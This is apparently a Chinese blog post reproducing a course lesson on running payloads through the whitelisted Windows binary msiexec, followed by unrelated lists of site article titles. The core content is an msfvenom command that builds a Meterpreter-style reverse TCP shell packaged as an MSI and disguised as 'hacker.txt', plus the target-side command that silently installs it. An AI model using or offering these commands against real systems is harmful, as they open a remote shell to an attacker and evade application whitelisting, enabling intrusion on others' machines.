复现亮神课程  基于白名单执行payload--Msiexec

0x01 关于msiexec

Msiexec 是 Windows Installer 的一部分。用于安装 Windows Installer 安装包（MSI）,一般在运行 Microsoft Update 安装更新或安装部分软件的时候出现，占用内存比较大。并且集成于 Windows 2003，Windows 7 等。

说明：Msiexec.exe所在路径已被系统添加PATH环境变量中，因此，Msiexec命令可识别。

Windows 2003 默认位置：

C:\WINDOWS\system32\msiexec.exe

C:\WINDOWS\SysWOW64\msiexec.exe

0x02 复现

Msf配置:

配置payload:

msfvenom -p windows/x64/shell/reverse_tcp LHOST= -f msi > hacker.txt

靶机执行:

C:\Users\Administrator\Desktop\Msiexec>msiexec /q /i hacker.txt

最新文章

1. LINQ系列：LINQ to SQL Transact-SQL函数
2. Python-基础-时间日期处理小结
3. 一个超复杂的间接递归——C语言初学者代码中的常见错误与瑕疵(6)
4. html之内联元素与块状元素；
5. HQL: Hibernate查询语言
6. 华为OJ平台——字符串通配符
7. Public, Private and Protect
8. c#用反射原理递归遍历复杂实体对象
9. JDBC连接池的简单实现
10. Nginx+Tomcat+Memcached实现tomcat集群和session共享
11. iOS程序员的React Native开发工具集
12. [2013-02-22]info入门FAQ
13. 201521123012 《Java程序设计》第七周学习总结
14. NOIP2016提高组初赛（C++语言）试题 个人的胡乱分析
15. JS函数可以再添加属性（包括方法）
16. webpack之带有可自动打开浏览器及热重载的基本配置
17. oracle出现sga导致ORA-00821 ORA-00093报错解决办法
18. 【织梦dedecms安全设置】dedecms如何防止被黑?dedecms被黑了怎么办?
19. Python模块——configparser
20. Java基础 【自动装箱和拆箱、面试题】

热门文章

1. asp.net core razor自定义taghelper
2. Yum未完成事务问题
3. Java面试-容器的遍历
4. C#中 CS1752无法嵌入互操作类型"OPCServerClass"。请改用适用的接口。
5. oracle 11g 下载安装 使用记录
6. JS中3种风格的For循环有什么异同？
7. What skills you need to become a full stack java developer?
8. Android Studio [水平布局LinearLayout]
9. 《HelloGitHub》第 42 期
10. mysql 查询常见时间段数据